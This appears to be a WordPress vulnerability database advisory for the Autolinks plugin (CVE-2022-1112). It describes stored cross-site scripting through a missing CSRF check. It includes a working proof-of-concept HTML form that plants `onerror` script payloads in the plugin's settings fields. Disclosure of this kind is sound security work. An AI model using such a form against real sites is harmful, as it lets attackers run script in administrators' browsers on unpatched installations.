WordPress Plugin Vulnerabilities

Autolinks <= 1.0.1 - Stored Cross-Site Scripting via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, and does not sanitise as well as escape them, which could allow attackers to perform Stored Cross-Site scripting against a logged in admin via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=wp-autolinks.php" method="POST">
      <input type="hidden" name="Image_Title_Prefix" value='Read Article:"><img src onerror=prompt(/XSS1/)>' />
      <input type="hidden" name="Image_Alt_Prefix" value="Read Article:"><img src onerror=prompt(/XSS2/)>" />
      <input type="hidden" name="Only_Auto_Link_First_Image" value="false" />
      <input type="hidden" name="Update_Auto_Link_Plugin_Settings" value="Update Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
autolinks
No known fix

References

CVE
CVE-2022-1112

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Vaibhav Nitin Gaikwad
Submitter
Vaibhav Nitin gaikwad
Submitter website
https://www.linkedin.com/in/vaibhav-gaikwad-55071b152
Verified
Yes
WPVDB ID
746c7cf2-0902-461a-a364-285505d73505

Timeline

Publicly Published
2022-03-28 (about 2 years ago)
Added
2022-03-28 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other

Published
Title
Published
2022-11-22
Title
Easy Video Player < 1.2.2.3 - Contributor+ Stored XSS
Published
2017-01-17
Title
WangGuard <= 1.7.2 - Authenticated Reflected Cross-Site Scripting (XSS)
Published
2023-12-09
Title
SlickNav Mobile Menu < 1.9.3 - Authenticated (Admin+) Stored Cross-Site Scripting
Published
2023-09-25
Title
Testimonial Slider Shortcode < 1.1.9 - Contributor+ Stored XSS
Published
2023-10-12
Title
Print, PDF, Email by PrintFriendly < 5.5.2 - Admin+ Stored XSS